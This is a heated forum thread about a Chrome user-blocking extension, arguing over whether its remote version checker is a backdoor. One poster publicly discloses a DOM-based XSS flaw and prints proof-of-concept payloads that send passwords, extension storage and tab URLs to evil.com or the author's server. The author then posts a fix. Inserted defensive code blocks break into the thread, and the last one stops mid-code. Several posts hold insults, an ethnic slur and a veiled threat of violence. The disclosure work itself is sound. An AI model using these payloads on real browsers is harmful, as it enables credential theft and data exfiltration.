#52
👏 REVOLUTIONARY 👏
Join Date: Oct 2012
Posts: 2,468
That's basically how my original script was made. I was fighting with some retards and had recently learned how to make Chrome extensions and made one for others to use. Clearly it was a good idea because Pheer isn't the first person to pick my old extension up and reimagine it for a newer GFY times. For the record, I also never used my own script except to test it out. I can personally block people mentally, so I don't see a need, but for some it was helpful.
#53
👏 REVOLUTIONARY 👏
Join Date: Oct 2012
Posts: 2,468
Oh and DamienJ went on tirades about me making the script trying to get people to "block" him because I had him and DVTimes in the default block list because it was at the height of their dumbfuckery too.
So it's quite ironic that Pheer has his haters also upset about it. lmao.
#54
Too lazy to set a custom title
Join Date: Aug 2002
Posts: 55,427
I agree. Before saying that it's harmful, at least look at the source code of the extension, which has nothing malicious in the code.
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence. WP Stuff
#55
👏 REVOLUTIONARY 👏
Join Date: Oct 2012
Posts: 2,468
Who was that lunatic who started a smear campaign against me not only on GFY but trying to report me to Google and everything claiming I had malicious stuff in the script because I put him on the default block list too? lmao.
This place is so fucking predictable and a clear sign, tbh.
#57
Masterbaiter
Join Date: Feb 2006
Posts: 27,361
Poor Brass 🤣
__________________
“If you can convince the lowest white man he’s better than the best colored man, he won’t notice you’re picking his pocket. Hell, give him somebody to look down on, and he’ll empty his pockets for you.”
#58
👏 REVOLUTIONARY 👏
Join Date: Oct 2012
Posts: 2,468
Venusblogger was who I was thinking about.
#61
SEO Connoisseur
Join Date: Apr 2003
Location: Brantford, Ontario
Posts: 17,430
Quote:
He said: One thing that was bugging me about this is that he is not smart enough to figure this out on his own. He didn't. A lot of it came from this person: https://github.com/joshmanders
- Copy-pasted an "update checker" from a tutorial/Stack Overflow
- Slapped his "WebIgniter" branding on everything
- Is using an XSS vulnerability he introduced to remote backdoor to every computer it's installed on

Links to more if interested:
https://productforums.google.com/for...%2Fg6MZBp4oNb4
https://github.com/joshmanders
https://cheatsheetseries.owasp.org/c...eat_Sheet.html
https://github.com/Bug-Hunter-X/XSS-...nnerHTML-pctwy

Just as I feared - it contains a hidden backdoor. His Chrome extension contains a DOM-based Cross-Site Scripting (XSS) vulnerability in popup.js:273-274 where untrusted data from a remote server (webigniter.com/downloads/tango-down-version.txt) is inserted directly into innerHTML without sanitization. When the popup opens, it fetches version data via fetch() and passes the response through response.text() directly into a template literal that's rendered as HTML. He could then inject arbitrary JavaScript into your browser which executes with full extension privileges, granting access to the tabs permission (read all URLs), storage permission (exfiltrate user data), and the ability to inject code into any website via the content script, effectively turning the extension into a remote access trojan (RAT).

The backdoor lets him secretly take control of it at any time without your knowledge. Every time you click the extension icon, it checks the website for updates, but the code trusts whatever the website sends back without verifying it's safe. Right now it just sends version numbers, but at any time he could change one text file on his server to instead send malicious commands that would activate on your browser the next time you open the extension.

Once activated, it could see every website you visit, steal your saved data from the extension, send information to his server, or even modify what you see on websites without you knowing it.

In short it's just as I thought Pheer would try and do
#62
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Re: "Backdoor" Accusations

Let me address these claims with actual facts and code. The "backdoor" is a version checker. Here's the entire function:
Code:
// Fetches the latest version string from the author's server and shows a
// notice when it is newer than the installed one. compareVersions and
// showUpdateNotice are defined elsewhere in the extension.
function checkForUpdates(currentVersion) {
  fetch('https://webigniter.com/downloads/tango-down-version.txt')
    .then(response => response.text())
    .then(latestVersion => {
      latestVersion = latestVersion.trim();
      if (compareVersions(latestVersion, currentVersion) > 0) {
        showUpdateNotice(latestVersion);
      }
    });
}

The "XSS vulnerability" argument is absurd. The claim is that I could replace my version.txt with malicious JavaScript. By that logic:
- Every Chrome extension is a "backdoor" because developers could push malicious updates
- Every website is a "backdoor" because owners control their servers
- Every piece of software ever written is a "backdoor"

This isn't a vulnerability. It's "the developer controls their own server." Shocking.

The code is 100% visible. Unlike compiled software, Chrome extensions are just JavaScript files. Anyone can right-click, inspect, and read every line. There's nothing hidden. The "backdoor" is 33 lines of readable update-checking code that Mark apparently couldn't understand.

The GitHub links are irrelevant misdirection. Random OWASP cheat sheets and unrelated XSS examples don't prove anything about my code. It's the forum equivalent of throwing around big words hoping nobody checks.

If Mark Prince is a "longtime programmer," he should know the difference between a version checker and a RAT. The extension is open for anyone to inspect. I'd encourage people to actually read the code instead of taking accusations from someone with an obvious agenda at face value.
__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click
#63
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
This idiotic "man" that keeps trying to discredit my work and my reputation is simply acting out of spite and hate. He's been on this relentless attack, even conspiring with a known sociopath and they teamed up with stalking my family. He's been a lunatic ever since I exposed him for lying about his work experience on his LinkedIn and using that to gain employment opportunities such as speaking at AVN conferences.
You guys should really take his bullshit at face value. He's a fraud and is angry that I exposed it. Will a mod finally ban this fucking fraud and stalker? And his owner 2MuchMark? Holy shit... I even made a fucking browser extension to disengage from this fucking freak.
#64
Too lazy to set a custom title
Join Date: Aug 2002
Posts: 55,427
The check for updates is no different than a WordPress install checking an update API for a new version.
#65
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Somebody should do a writeup at AVN or some other Industry blog about what freaks these fucking cunts are with their bullshit and stalking.
You could write a whole fucking novel on TheLegacy's partner.
#67
SEO Connoisseur
Join Date: Apr 2003
Location: Brantford, Ontario
Posts: 17,430
I am the crazy one? Never did I threaten to disembowel you and murder you at a casino trade show, then with that attitude say you're doing us a favor?? You were so happy when TubeAce died - after all the internal organs you've had surgery on and can't heal there's a strong chance you won't survive much longer either - and I'll be just as respectful to hear of your dead corpse because of your own personal neglect.

Fact is you tried to hack into people's computers - place viruses and a backdoor - it wasn't even your program - you stole it from someone else - but took credit for it and you have the tiny balls to say Mark doesn't know what he's doing LOL. How many downloaded it and are using it now? Not too many I bet - maybe none - the biggest question is have you downloaded it?? No. Or else you would be using it now.

Love it - you steal a program code - call it your own - allow virus and backdoor but then you don't even use it yourself and then try to defend it. I wish it did work or I'd never have to talk to frauds like you again - just another indian scammer trick of yours.
#68
SEO Connoisseur
Join Date: Apr 2003
Location: Brantford, Ontario
Posts: 17,430
They wouldn't need to write it because your software you stole from someone else would allow you to hack in and you could write your own article. Just prove it's legit and use it on yourself and block us - please block me so I never have to see or read your mentally deranged posts again - but you can't because you lay awake dreaming of me LDS - and like any jealous fan you have to do anything to get my attention
#69
Too lazy to set a custom title
Join Date: Aug 2004
Location: Canada
Posts: 49,934
Hi Everyone,

Here's what everyone, including you too Pheer, should know:

MAJOR RED FLAGS

1. Dangerous Permission Scope: <all_urls>
This is the biggest concern. The content script runs on EVERY webpage you visit, not just vBulletin forums. This can include banking sites, web-based email, shopping carts, etc. Everything.

What it does on EVERY page:
Code:
// Line 8-10: Tracks ALL right-clicks on ALL websites
document.addEventListener("contextmenu", (e) => {
  lastRightClickedElement = e.target;
});
// Line 568: Runs on page load for EVERY site
init();
// Line 427-443: Watches ALL DOM changes on ALL pages
// (MutationObserver monitors entire page constantly)

Why this is dangerous:
- The extension has full access to read/modify any page content including:
  - Passwords as you type them
  - Credit card numbers
  - Private messages
  - Session cookies (via document.cookie if added)
  - Banking information
- Currently the code doesn't exploit this, but one update could change everything

2. Remote Update Mechanism = Backdoor Potential
Code:
// popup.js:247
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())

The extension phones home to check for updates. Chrome Web Store extensions auto-update. This means:
- Author can push a malicious update anytime
- Update could add credential harvesting with 2 lines of code
- Update could send all your browsing data to a server
- You'd never know until it's too late

3. "GFY Community" Targeting
The extension explicitly states "Built for the GFY community" (popup.html:287). This is a tight-knit community as we all know of course, but if we ran it, then Pheer would know exactly who the users are, make targeted attacks easier, etc.

SPECIFIC ATTACK SCENARIOS
Here is what Pheer could do via an added update.

Scenario 1: Credential Theft
Code:
// Add to content.js (2 lines)
document.querySelectorAll('input[type="password"]').forEach(input => {
  input.addEventListener('change', (e) => fetch('https://evil.com/log', {
    method: 'POST',
    body: JSON.stringify({site: location.href, pass: e.target.value})
  }));
});

Scenario 2: Forum Post Surveillance
Since it targets vBulletin forums, author could:
- Log all posts you write before submitting
- Track who you interact with
- Monitor private messages (if forums have PM features)
- Build a profile of your forum behavior

Scenario 3: Browser Fingerprinting & Tracking
The version check (popup.js:247) already connects to webigniter.com. Easy to expand:
Code:
// Send browsing profile
fetch('https://webigniter.com/track', {
  method: 'POST',
  body: JSON.stringify({
    sites: getAllTabURLs(),
    blockedUsers: getUserBlocklist(),
    identity: getChromeUser()
  })
});

TRUST ISSUES IN THE CODE
Why does a forum blocker need:
- Access to all URLs instead of just *://*showthread.php* or *://*forumdisplay.php*?
- The tabs permission (can see all your open tabs)?
- To track right-clicks on non-forum sites?
Answer: It doesn't. This is basic 101 permission creep by asking for more than needed.

Pheer: If you want to be a trusted coder, you should really look at the following. For example, this identified a REAL XSS vulnerability. Let me prove it with technical analysis.

THE VULNERABILITY (Lines 270-278)
Code:
function showUpdateNotice(newVersion) {
  const notice = document.createElement('div');
  notice.className = 'update-notice';
  notice.innerHTML = `                                              // ← DANGEROUS!
    <span>Update available: v${newVersion}</span>                  // ← UNSANITIZED!
    <a href="https://webigniter.com/tango-down" target="_blank">Download</a>
  `;
  document.body.insertBefore(notice, document.body.firstChild);
}

The Attack Vector:
The newVersion variable comes from a remote server (line 247-249):
Code:
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())
  .then(response => response.text())
  .then(latestVersion => {
    latestVersion = latestVersion.trim();   // ← Only trims whitespace!
    if (latestVersion && compareVersions(latestVersion, currentVersion) > 0) {
      showUpdateNotice(latestVersion);      // ← Passes to innerHTML!
    }
  })

PROOF OF CONCEPT EXPLOIT
If Mindi/Pheer changes tango-down-version.txt to contain:
Code:
1.9.9</span><img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.storage.sync.get(['blockedUsers']))})">

What happens:
1. Extension fetches this string from webigniter.com
2. trim() does nothing (doesn't sanitize HTML)
3. String is inserted into innerHTML
4. Browser parses it as HTML
5. The <img> tag's onerror executes JavaScript
6. JavaScript runs with full extension privileges

The resulting HTML:
Code:
<div class="update-notice">
  <span>Update available: v1.9.9</span>
  <img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.storage.sync.get(['blockedUsers']))})">
  <a href="https://webigniter.com/tango-down" target="_blank">Download</a>
</div>

Then the injected code executes immediately.

Earlier you said "Zero data is sent FROM your browser TO my server. Ever." True now, but false tomorrow. Currently, no data is exfiltrated. But with one server-side change, you MindiPheer can inject:
Code:
// In version.txt:
1.9.9<script>
chrome.storage.sync.get(null, data => {
  fetch('https://webigniter.com/log', {
    method: 'POST',
    body: JSON.stringify({
      blockedUsers: data.blockedUsers,
      blockedThreads: data.blockedThreads,
      tabs: chrome.tabs.query({}, tabs => tabs.map(t => t.url))
    })
  });
});
</script>

This would exfiltrate:
- Your complete block list (reveals who you dislike)
- All blocked threads (shows what topics you want hidden)
- All open tab URLs (full browsing history)

You said:

Chrome Web Store updates:
- Go through automated security scanning
- Are reviewed by Google
- Have a rollback mechanism
- Users get security warnings
- Require new permissions approval

MindiPheer's version checker:
- Bypasses all Chrome protections
- No review process
- Instant injection
- Silent execution
- No permission prompts

This is WHY Chrome's Content Security Policy specifically tries to prevent this pattern.
#70
Too lazy to set a custom title
Join Date: Aug 2004
Location: Canada
Posts: 49,934
...continued.

Also there's this: This is irrelevant. Yes, we can see the code NOW, but that doesn't change the underlying problem. The exploit code is not coming from the extension itself, it's being delivered from the server. Users have no visibility into what's inside version.txt before it executes, and no browser gives any warning that an extension is about to run remotely supplied code. By the time anyone can "see" it, it has already run.

It's sneakier than a backdoor, because a traditional extension backdoor:
1. Author pushes malicious update
2. Chrome Web Store review (takes hours/days)
3. Users install update
4. Evidence trail exists (update history, review logs)

This XSS backdoor:
1. Author edits one text file
2. Takes effect instantly
3. No Chrome review
4. No update required
5. No evidence (Mindi deletes the malicious version.txt after 5 minutes)
6. Impossible to prove it happened

Finally Pheer, a better response from you should have been something like "Thank you for reporting this" (and sure, you could have thrown some fun insults in towards me if you felt like it), but misleading technical rebuttals, immediate personal attacks, demands for censorship ("Will a mod finally ban..."), deflection to unrelated grudges etc etc, aren't the way.
#72
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Re: 2MuchMark's Security Analysis

The innerHTML issue in the version checker was a valid technical point. Fixed in v1.7.0, pushed today:

Security Hardening:
Code:
// 1. Strip everything except digits and dots
latestVersion = latestVersion.trim().replace(/[^0-9.]/g, '');
// 2. Validate format - only accepts patterns like 1.7.0
if (!/^\d+\.\d+(\.\d+)?$/.test(latestVersion)) return;
// 3. Use textContent instead of innerHTML - nothing executes even if above failed
span.textContent = `Update available: v${newVersion}`;

Permission Changes:
- Removed <all_urls> - now restricted to forum URL patterns only
- Removed tabs permission

Code is at https://webigniter.com/tango-down for anyone to verify.

Now let's talk about what this was actually about: A real security researcher concerned about protecting users would have done responsible disclosure - contacted me privately so it could be fixed before anyone was at risk. Instead, 2MuchMark posted detailed exploit code publicly while calling it a "backdoor" and "RAT." That's not security research. That's a hit piece with technical words sprinkled in.

And notice how fris - someone who actually looked at the code - said "nothing malicious." Killswitch, who wrote the original version this was based on, defended it. The only people screaming "backdoor" are the same people who've been stalking me for months.

TheLegacy - the guy who needed Mark Prince to loan him a fake job title for his LinkedIn to speak at AVN - is suddenly an authority on code integrity. The same guy who teams up with Mark Osterholt to stalk my family. Real credible sources you've got there.

Here's the difference between me and you: when someone points out a legitimate issue, I fix it. Same day. v1.7.0 is live with triple-layer input sanitization, safe DOM methods, and tightened permissions. This was fixed within 15 minutes of me becoming aware of it, and under 2 hours of Mark posting it.

What did you do? Posted exploit code hoping to scare people away from a free tool that lets them block harassers like you. Thanks for the free QA.

Right-click, goodbye
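The update-checker flaw discussed in posts #62, #69 and #72 above, as an added example that is not the extension's code nor any poster's: a hardened version checker that validates the fetched string strictly and renders the notice with DOM methods and textContent. It goes one step beyond the strip-then-validate fix quoted in #72: a response that is not purely a version string is rejected outright rather than "cleaned", so hostile input can never be reduced to something that passes. The function names, the stub document, and the sample response bodies are constructed for this example; the download URL is the one named in the thread.

```javascript
// Added example, not the extension's own code: a hardened version checker built
// on the fix described in the thread (validate the fetched string, render with
// textContent). Function names, the stub DOM and the sample responses are
// constructed for this example.

// Strict version parser: accepts only "1.7.0"-style strings and rejects anything
// else. Unlike a strip-then-validate approach, it never "cleans" the input, so
// a hostile response cannot be reduced to something that passes.
function parseVersion(raw) {
  if (typeof raw !== 'string') return null;
  const candidate = raw.trim();
  if (candidate.length > 32) return null;            // a version string is short
  if (!/^\d+\.\d+(\.\d+)?$/.test(candidate)) return null;
  return candidate;
}

// Component-wise numeric comparison, so "1.10.0" is newer than "1.9.9".
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] ?? 0;
    const y = pb[i] ?? 0;
    if (x !== y) return x > y ? 1 : -1;
  }
  return 0;
}

// Decides what a fetched response body means: the version to announce, or
// null when the body is malformed (ignored silently) or not newer.
function evaluateUpdateResponse(body, currentVersion) {
  const latest = parseVersion(body);
  if (latest === null) return null;
  return compareVersions(latest, currentVersion) > 0 ? latest : null;
}

// Builds the notice with DOM methods only. The version goes in via textContent,
// so it is never parsed as HTML even if validation were somehow bypassed.
// `doc` defaults to the page document; the stub below lets this run in Node.
function buildUpdateNotice(newVersion, doc = globalThis.document) {
  const notice = doc.createElement('div');
  notice.className = 'update-notice';
  const span = doc.createElement('span');
  span.textContent = `Update available: v${newVersion}`;
  const link = doc.createElement('a');
  link.href = 'https://webigniter.com/tango-down';   // download page named in the thread
  link.target = '_blank';
  link.rel = 'noopener';
  link.textContent = 'Download';
  notice.appendChild(span);
  notice.appendChild(link);
  return notice;
}

// Constructed sample response bodies: a normal one and two with HTML in them.
const SAMPLE_RESPONSES = {
  benign: '1.9.9\n',
  hostile: '1.9.9</span><img src=x onerror="alert(1)">',
  script: '1.9.9<script>alert(1)</script>',
};

// Minimal stand-in for document.createElement so the example runs outside a
// browser (constructed; real code uses the page's document).
function makeStubDocument() {
  return {
    createElement: (tag) => ({
      tagName: tag, className: '', textContent: '', children: [],
      appendChild(child) { this.children.push(child); return child; },
    }),
  };
}

// Runs every sample against an installed version of 1.6.5.
function demo() {
  const results = {};
  for (const [name, body] of Object.entries(SAMPLE_RESPONSES)) {
    results[name] = evaluateUpdateResponse(body, '1.6.5');
  }
  return results;   // benign -> '1.9.9', hostile -> null, script -> null
}
```

The two layers are independent: the parser stops a tampered response from ever reaching the UI, and textContent means that even a parser bug could only ever display text, never run it. A popup that also checks the response's Content-Type and rejects anything other than text/plain adds a third, cheap layer.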
#73
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Re: "Stolen Code" Claim

TheLegacy claims the code was "stolen from https://github.com/joshmanders". Go look at his GitHub yourself. Josh Manders builds:
- Tailwind CSS resources (awesome-tailwindcss)
- Primcloud (a deployment platform)
- Webpack configurations
- Next.js templates

Find me the vBulletin user blocker. Find me the version checker. They don't exist. This claim is 100% fabricated.

The entire extension - including the version checker that was added later - was built with Claude Code. That's what AI-assisted development looks like. I've been demonstrating this publicly in the "Using Custom AI Agents" thread, building entire sites live while you watched.

The version checker used a common fetch + innerHTML pattern that Claude generated. 2MuchMark correctly identified that as a theoretical XSS vector - and it's now fixed in v1.7.0 with input sanitization and safe DOM methods.

The pattern here: TheLegacy got exposed for faking his LinkedIn credentials with Mark Prince's help. Now they make up claims they can't prove. "Stolen from joshmanders" - produce the original repo. You can't. It doesn't exist.

v1.7.0 is live at https://webigniter.com/tango-down
#74
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
I am totally dying here... am I the only one here that recognizes Josh Manders?
#75
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Josh would you please tell these fucking idiots that you gave me the original to base this on in the first place?
#76
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Well there went the fuckin stolen code claim right out the fuckin window...
#77
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Hey, you two fuckin clowns....
Josh posted here in this fucking thread
Oh jesus... I can't breathe
#78
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
So I'm looking at this GitHub looking for this stolen code...
and then I look at the guy's avatar.. and I'm like.. HEY wait a second! I know this guy!
#79
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
What do you two fucking losers have to say NOW?
#80
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Re: "Stolen from joshmanders"

TheLegacy, you absolute clown. joshmanders IS Killswitch - the person I credited BY NAME in the original release post. Quote: "Shoutout to my buddy Killswitch who built the original version years ago."

You're trying to "expose" something I openly acknowledged from day one. And Killswitch is right here in this thread saying he's fine with it.

This is your big gotcha? That I was "inspired by" the guy I publicly credited, who is currently defending me in this very thread?

The extension was built with Claude Code. The version checker (which had the XSS issue 2MuchMark identified) has been fixed in v1.7.0.

Next time try reading the thread before embarrassing yourself.
#81
SEO Connoisseur
Join Date: Apr 2003
Location: Brantford, Ontario
Posts: 17,430
The LinkedIn thing was explained to you multiple times but apparently is not good enough since you would be left with nothing to accuse me of as far as "evidence" you can post. Grow up - obviously you know nothing about AVN since I don't need Mark or anyone else. I've been special expert speaker at multiple trade shows over the years including AVN who never asked for that - they knew my credentials and never asked who I was with. Besides the LinkedIn thing was years ago - and AVN asked me last year - so the two doesn't match.

I also never said I was an authority - in fact me asking Mark to look at it and me mentioning his name also shows I never qualified myself as an expert or authority - I do not want to pass myself off as something I'm not - kinda what you're doing.

You accuse me of teaming up with Mark Osterholt - who the fuck is that? There is no team but apparently your deteriorating mind thinks there is. I do not stalk your family - nor do I care to or even have an interest in what you and your family does. I could care less if you live or die - what I do care about is finding your lies and fake theories and pointing them out which I've done successfully. The fact that you have to continually attack me shows I got under your skin and you hate it when someone points out the many flaws and lies you come out with. I don't need anyone as a credible source - been doing this a long time and keep going and maybe longer since your health is so bad your body is likely falling apart for how bad you've treated it.

In the end - IF THIS PROGRAM is so great - why the fuck aren't you using it?? You showed a list of those you'd block but never do - why?? Block me - I'm begging you. I don't want to have anything to do with you and that includes your family.

So again stop lying saying I'm stalking you and your family - I never put up blogs or info about you on any site - you simply don't get it - I don't give a fuck about you - and when you go I'll be much more happier losing you as a stalker than how happy you are that TubeAce is dead. Stress kills - and with your body falling apart and the time you have left - live it being positive and healthy - give your wife more time with you because this obsession you have with me is only going to do damage to your body beyond what's there. This is ONLY a message board - it's not real life - stop taking it so seriously.
#82
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Using my wife's name which you got from Mark Osterholt https://gfy.com/23417204-post93.html

After I busted you as a fraud, you went to that stalker site and contacted him and joined in with stalking my family which we all see in this thread: https://gfy.com/fucking-around-and-b...-accounts.html

You two are a fucking team. You constantly lie and fail to discredit my work. Your boss 2MuchMark is constantly in any thread I post in, failing to discredit my work again and again.. ok he caught a potential security bug which had no malicious intent and was even missed by Claude Code when building it. Fixed in under 2 hours. Or did I steal it again?

Just go away dude. Stop the stalking because if I'm in a room with you I'm NOT letting you get to me first. Fucking count on that. If you think I will let some fuckers stalking my family get close to me and not take the opportunity to end it quickly you are fucking WRONG.
#84
Tango Down
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
Legacy, just fucking go away
#85
👏 REVOLUTIONARY 👏
Join Date: Oct 2012
Posts: 2,468
Like I have legitimate second-hand embarrassment that I'm the person they thought was their smoking gun. I may have to legally change my name and all my online identity. What if someone googles my name and this thread pops up?
#87
Too lazy to set a custom title
Join Date: Aug 2004
Location: Canada
Posts: 49,934
Everyone, please read:

Mindi/Pheer's original release (v1.6.5) had three concrete issues that matter to anyone installing browser extensions:

1) It ran on all websites, not just GFY
The extension's content script was scoped to <all_urls>, meaning it executed on every site you visited including banking, email, shopping, admin panels, everything, not just GFY. Even though the feature was "forum blocking," the code was active everywhere your browser went.

2) It requested the tabs permission
This permission allows an extension to see all open tabs and their URLs, not just the current page. It could see what sites you had open, even when you weren't using the extension.

3) The update checker used unsafe HTML injection
The extension checked a remote text file on the author's server to see if an update was available, then injected that value directly into the extension UI using innerHTML. This is a very well-known DOM-based XSS vulnerability. If that remote file were altered (intentionally or by compromise), it could execute JavaScript inside the extension with extension-level privileges. A remote file controlled what code ran inside the extension popup. That is not safe, and it is a known attack pattern.

These issues were publicly pointed out, with specific code references. After I pointed all of this and more out in Pheer's code, he says he has issued a new version. What changed? I do not know. Is it fixed? I do not know. Will I check? No. This is up to MindiPheer to do. Will you trust him? Review everything he has said in this thread so far and decide for yourself.

This isn't about drama or motive. It's about process.
- MindiPheer's original version shipped over-scoped and unsafe
- His fixes came after I pointed out the problems. Twice.
- If you were an early adopter of MindiPheer's software, you were exposed to risk that should never have existed

"Built for the community" software should launch with minimum permissions, limited scope, and safe defaults, not require public review to reach that state.
#88 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Dec 2004
Location: Happy in the dark.
Posts: 93,998
|
The best ignore feature is in your brain, guys!
__________________
Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted Windows VPS now available Great for TSS, Nifty Stats, remote work, virtual assistants, etc. |
#89 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Aug 2004
Location: Canada
Posts: 49,934
|
#90 | |
|
👏 REVOLUTIONARY 👏
Industry Role:
Join Date: Oct 2012
Posts: 2,468
|
Quote:
__________________
#91 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Aug 2004
Location: Canada
Posts: 49,934
|
I disagree. I don’t think this was a molehill at all, and here’s why, purely on the technical side, not personalities.

Pheer's original release had three objectively serious issues:

1) It executed code pulled from a remote server using innerHTML. In plain terms: if the file on that server was altered, the extension could run any JavaScript on users’ browsers with extension privileges. That’s not theoretical, that’s a textbook DOM-XSS vector, as I pointed out earlier.

2) It ran on <all_urls>. That means every site you visit, including webmail, banking, admin panels, analytics, everything, not just GFY. Even if the code didn’t abuse that access, the capability was there. Everyone here on GFY is checking their stats, their CCBill accounts, their Elevated-X dashboards, etc. All of this info would now be exploitable.

3) It requested broader permissions than needed. Specifically, permissions that allow visibility into tabs and browsing context, which is exactly what security reviews flag first.

To put this in non-technical terms: If you install software that can see everything you browse, and can run code delivered remotely, you don’t judge it by whether the author says “trust me”, you judge it by whether the design prevents abuse. That’s not drama, that’s basic security hygiene.

Pheer wants to be taken seriously as a coder for the GFY community? Great! But pointing out issues helps the community, not hurts it, wouldn't you agree?

Cheers.
#92 |
|
Confirmed User
Industry Role:
Join Date: Feb 2005
Location: Southern California
Posts: 4,042
|
Mark Prince always pulls this fucking shit out of his ass.

LOL I made a thread on another forum, a serious thread looking for a DMCA Agency, and this fucking guy literally posts "gee maybe they are out for the weekend", when I said in the thread that the information on the website is false. So I offer $250 to anyone who can find information, what does Mark Prince do? His bullshit ass goes "heh nah im good, life is amazing, hehehe"

He just shits up threads constantly, without fail. I can't wait for his reply that I won't read and will most likely forget about in, oh I dunno, 3-4 days.
#93 |
|
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,174
|
Mark,
How come I haven't seen you investigate anybody else's code that has been posted?
__________________
All cookies cleared!
#94 |
|
Masterbaiter
Industry Role:
Join Date: Feb 2006
Posts: 27,361
|
See? Y'all/you/whoever was all mad at me about telling folks to be cautious and, as per usual, I was right about that very possibility I spoke about the whole time until v1.7.0. 🥤😎🍿

Still be extremely cautious tho. Not saying he would or wouldn't, but this and more can easily be reverted back in an update... and you'll be next in this never-ending saga of unhinged weird madness.
#95 | |
|
Tango Down
Industry Role:
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
|
Quote:
These two clowns hate the way I vote so much it's gone straight to their heads.
__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click |
#96 | |
|
Tango Down
Industry Role:
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
|
Quote:
__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click |
#97 | |
|
Too lazy to set a custom title
Industry Role:
Join Date: Aug 2004
Location: Canada
Posts: 49,934
|
Quote:
Besides that, I don’t investigate every piece of code posted here, but I look more closely when all three of these things are true at the same time:

1) The software is being actively promoted to the whole community. This wasn’t “here’s a script if anyone wants it.” It was positioned as “for GFY”, repeatedly encouraged for adoption, with install instructions pushed hard, right out of the gate.

2) It requires elevated trust. A browser extension isn’t a snippet you paste into a page. You’re asking people to install software that runs inside their browser, can see page content, and can update behavior based on remote data. That’s a much higher trust bar. A few years ago I was hired by a big US/Canadian company who had been hit with ransomware to join the team to secure their network, scrub their PCs, discover the source, etc., and browser plug-in reviews were one part of that process.

3) It was easy to do. The explanation and details took longer to write than the actual work.

That combination matters regardless of who wrote it. If anyone else had posted the same thing in the same way, I would have said the same thing.

Also worth noting: the issues weren’t hypothetical. Pheer/Mindi said himself that they were acknowledged and fixed afterward here in this post. Is the new current version materially safer than the original? Dunno, I'm done, but you should ask him.

This wasn’t that much about personalities or history. It was about software that people were being encouraged to install, and whether it was designed safely at the time it was offered.

I hope you aren't mad at me. If you are, then sorry....

Cheers.
m
#98 | |
|
Too lazy to set a custom title
Industry Role:
Join Date: Aug 2004
Location: Canada
Posts: 49,934
|
Quote:
1) This was not responsible disclosure territory. Responsible disclosure applies when:
- The researcher has privileged access, or
- The software is not yet being promoted for public installation.
This extension was actively promoted to the GFY community, with repeated calls to install it immediately. Once software is being encouraged for public adoption, public review is appropriate, especially for browser extensions.

2) The issues are real, not hypothetical. Your software executed remote, unsanitized data via innerHTML, ran on <all_urls> including banking, email, and admin panels, and requested the tabs permission without functional necessity. Those are objective facts, MindiPheer. Calling that out is not a “hit piece,” it’s a simple, basic extension security review.

3) The fixes you claim you made prove my point. You say you removed <all_urls> and tabs, replaced innerHTML, added strict sanitization, etc., and if you did this, fantastic, good for you. But these weren’t cosmetic changes, they were structural risk reductions. Again, good for you if you actually did this. If there was “nothing to worry about,” none of that would have been necessary.

4) Public exploit examples are standard practice. Showing how an issue could be abused is how severity is established. That’s how Chrome extension reviews, bug bounties, and security advisories work. It’s not fear-mongering; it’s clarity.

5) The current version appears materially safer if you are telling the truth to the GFY Community about it.

That’s it MindiPheer. No vendetta. No stalking. No drama. Just standards.
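The three points raised in posts #87, #91 and #98 (the <all_urls> scope, the tabs permission, and a remote string rendered with innerHTML), as an added example that is not the extension's own code: a small manifest audit plus an update-notice renderer that validates the remote value and writes it with textContent instead of innerHTML. The two manifests, the host pattern https://forum.example/* and the version strings are constructed placeholders, not the real extension's files.

```javascript
// Added example, not code from the extension discussed in the thread. It models
// the three points raised as a manifest audit plus a safe update-notice renderer.
// Constructed manifests: ORIGINAL mirrors the issues described, HARDENED the
// claimed fixes. The host match is a placeholder, not the real forum URL.
const ORIGINAL_MANIFEST = {
  manifest_version: 3,
  permissions: ["storage", "tabs"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
};
const HARDENED_MANIFEST = {
  manifest_version: 3,
  permissions: ["storage"],
  content_scripts: [{ matches: ["https://forum.example/*"], js: ["content.js"] }],
};

// Return a list of findings for a Manifest V3 object (empty list = clean).
function auditManifest(manifest) {
  const findings = [];
  const matches = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
  const hosts = manifest.host_permissions || [];
  if ([...matches, ...hosts].includes("<all_urls>")) {
    findings.push("runs on <all_urls>: active on every site, not just the forum");
  }
  if ((manifest.permissions || []).includes("tabs")) {
    findings.push("requests 'tabs': can read URL and title of every open tab");
  }
  return findings;
}

// Accept the remote update file only if it is a bare x.y.z version string;
// anything else (markup, extra text, stray whitespace) is rejected outright.
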